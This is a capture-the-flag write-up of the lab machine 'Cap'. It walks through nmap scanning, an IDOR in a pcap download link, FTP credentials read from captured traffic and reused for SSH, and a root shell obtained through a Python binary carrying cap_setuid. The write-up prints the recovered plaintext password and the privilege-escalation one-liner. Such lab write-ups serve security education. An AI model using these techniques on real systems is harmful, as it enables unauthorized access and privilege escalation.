Cap starts by identifying an IDOR vulnerability on its hosted website. Using this IDOR, I can obtain a pcap file containing a set of FTP login credentials that can also be used for SSH login. Enumerating the system reveals that the installed Python binary has the CAP_SETUID capability set, which can be exploited to gain root access.

Skills Learned

  • Identifying/Exploiting IDOR
  • Exploiting CAP_SETUID on Python

Tools

  • nmap
  • wireshark

Reconnaissance

Nmap

Running nmap scan against this machine reveals 3 open ports: SSH on 22, FTP on 21, and HTTP on 80.

→ root@kali «cap» «10.10.14.34» 
$ nmap -p- --min-rate 1000 --reason -oA nmap/10-tcp-allport 10.10.10.245        
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-09 05:07 EDT
Nmap scan report for 10.10.10.245
Host is up, received echo-reply ttl 63 (0.070s latency).
Not shown: 65532 closed ports
Reason: 65532 resets
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Nmap done: 1 IP address (1 host up) scanned in 45.33 seconds
→ root@kali «cap» «10.10.14.34» 
$ nmap -p21,22,80 -sC -sV -oA nmap/10-tcp-allport-script 10.10.10.245
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-09 05:08 EDT
Nmap scan report for 10.10.10.245
Host is up (0.062s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Wed, 09 Jun 2021 09:08:25 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Wed, 09 Jun 2021 09:08:19 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">

...[SNIP]...

|_http-server-header: gunicorn
|_http-title: Security Dashboard
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=6/9%Time=60C08501%P=x86_64-pc-linux-gnu%r(GetRe
SF:quest,2FE5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20W

...[SNIP]...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.73 seconds

Since nmap didn’t show anonymous login in FTP, I will head to the website.

Enumeration

TCP 80 - Website

When I get to the website on port 80, I find that I’ve already logged in as Nathan.

image-20210609162151343

There are some menu in the side navigation bar. One menu that I find interesting is the “Security Snapshot”.

image-20210609162215061

In the “Security Snapshot” page, there is a download button which gives me a pcap file. Based on the URL, it seems there are 8 pcap files that have been generated so far.

image-20210609162434839

When I open the pcap file, it was empty.

IDOR

The download URL for pcap file is interesting here, and when I change it to 0, it pops another download prompt.

image-20210609162545619

Foothold

Shell as nathan

Pcap Analysis

There are quite a lot of traffic captured in this 0.pcap file, but if I filter it to only show FTP, it shows that there is an FTP login performed by user nathan. Since there is no encryption, I can also see the login password.

image-20210609162111265

FTP access

Entering nathan:Buck3tH4Tf0RM3 logs me in into the FTP server, and I can read the user flag from there.

→ root@kali «cap» «10.10.14.34» 
$ ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1001     1001         8088 Jun 09 08:04 25134.c
-rwxrwxr-x    1 1001     1001        18360 Jun 09 08:25 exp
-rwxrwxr-x    1 1001     1001       342868 Jun 09 06:24 linpeas.sh
drwxr-xr-x    3 1001     1001         4096 Jun 09 06:26 snap
-r--------    1 1001     1001           33 Jun 09 04:59 user.txt
226 Directory send OK.
ftp> 

SSH - nathan

The credentials can also be used for SSH login.

→ root@kali «cap» «10.10.14.34» 
$ ssh nathan@10.10.10.245
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jun  9 09:35:15 UTC 2021

  System load:           0.0
  Usage of /:            35.0% of 8.73GB
  Memory usage:          34%
  Swap usage:            0%
  Processes:             229
  Users logged in:       0
  IPv4 address for eth0: 10.10.10.245
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f2f1

  => There are 4 zombie processes.

...[SNIP]...

Last login: Wed Jun  9 08:53:04 2021 from 10.10.16.15
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)

Privilege Escalation

Shell as root

Web source code

With shell access, I went to the web directory.

nathan@cap:/var/www/html$ ls -l
total 24
drwxr-xr-x 2 nathan nathan 4096 May 27 09:10 __pycache__
-rw-r--r-- 1 nathan nathan 4293 Jun  9 10:19 app.py
drwxr-xr-x 6 root   root   4096 May 23 19:17 static
drwxr-xr-x 2 root   root   4096 May 23 19:17 templates
drwxr-xr-x 2 root   root   4096 Jun  9 10:12 upload
nathan@cap:/var/www/html$ 

Looking at the source code, I see one interesting line code in a variable called command.

#!/usr/bin/python3
...<SNIP>...
@app.route("/capture")
@limiter.limit("10 per minute")
def capture():

        get_lock()
        pcapid = get_appid()
        increment_appid()
        release_lock()

        path = os.path.join(app.root_path, "upload", str(pcapid) + ".pcap")
        ip = request.remote_addr
        # permissions issues with gunicorn and threads. hacky solution for now.
        #os.setuid(0)
        #command = f"timeout 5 tcpdump -w {path} -i any host {ip}"
        command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""
        os.system(command)
        #os.setuid(1000)
...[SNIP]...

Linux Capabilities

When I examine the running process, the web server is currently running as nathan, so os.setuid(0) shouldn’t be possible, except the binary has a CAP SETUID capability set.

image-20210609174520024

A quick check on the Python binary shows that it has the cap_setuid set.

nathan@cap:/var/www/html$ ls -l $(which python3)
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8
nathan@cap:/var/www/html$ ls -l $(which python3.8)
-rwxr-xr-x 1 root root 5486384 Jan 27 15:41 /usr/bin/python3.8
nathan@cap:/var/www/html$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

So I can escalate myself to root with python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'.

nathan@cap:/var/www/html$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/var/www/html# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
root@cap:/var/www/html# cd /root/
root@cap:/root# ls -l
total 8
-r-------- 1 root root   33 Jun  9 04:59 root.txt
drwxr-xr-x 3 root root 4096 May 23 19:17 snap

Reference